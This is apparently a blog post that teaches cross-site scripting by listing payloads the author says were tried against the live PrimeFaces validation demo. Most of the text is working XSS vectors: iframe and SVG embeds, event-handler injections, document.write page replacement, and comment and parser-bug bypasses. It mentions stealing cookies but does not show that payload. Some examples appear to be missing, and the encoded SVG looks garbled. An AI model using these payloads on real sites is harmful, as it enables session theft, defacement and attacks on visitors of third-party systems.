Hello everyone! Sometimes even professionals forget how to do a simple configuration, and we will take advantage od that to learn some Java Hacking with a technique named XSS over a real JSF enviroment.
Primefaces.org is the site for the JSF library primefaces that is not only very popular but very attractive visually. I was navigating the site in my quest for validation hints and realized the validation demo was vulnerable, and decided to use it to learn on a real enviroment the hacking technique called cross site scripting or XSS.
The power of this type of attack technique resides on that when the data get’s saved, everytime it get’s consulted will always run the code we introduced. Let’s go to the examples.
With this vector we can in example obtain the cookies that the site handles
Or simply show an iframe
"><iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://javapro.org/"></iframe>
we can also execute some code from an HTML5 video object
We can also generate a button an make the code we wish to be executed when clicked by
In the same way we can also use a math object
Math objects can also have some other executable objects inside
From an embedded and executing a svg image
"><EMBED SRC="data:image/svg xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI YWxlcnQoImphdmFwcm8ub3JnIik7PC9zY3JpcHQ PC9zdmc " type="image/svg xml" AllowScriptAccess="always"></EMBED>
the last script produces exactlythe same results as the preceding one
Using AJAX validation we can achieve the code to be executed as you write by using event attribute from script tag
"><SCRIPT FOR=document EVENT=onreadystatechange>alert('javapro.org')</SCRIPT>
in a similar way we can even modify the current label an achieve that when we pass the mouse over the label our code will be executed
" onmouseover="alert('javapro.org')" >
Moreover we don’t even need angular brackets
" onmouseover="alert;throw 1;"
We can also show a new page
" onmouseenter="document.open();document.write('<html><body><p>JavaPro.org</p></body></html>');document.close();" >
We can produce a message followed by an error
" onmouseenter="document.location=alert('javapro.org')//" >
Or a redirect call, in example
HTML comments are harmless doesn’t them? NO!
<!--<img src="--><img src=x onerror=alert('javapro.org')//"-->
Taking advantage of a parsing bug.
<![><img src="]><img src=x onerror=alert('javapro.org')//">
We can also ofuscate a bit and take advantage of parsers errors
"><style><img src="</style><img src=x onerror=alert('javapro.org')//">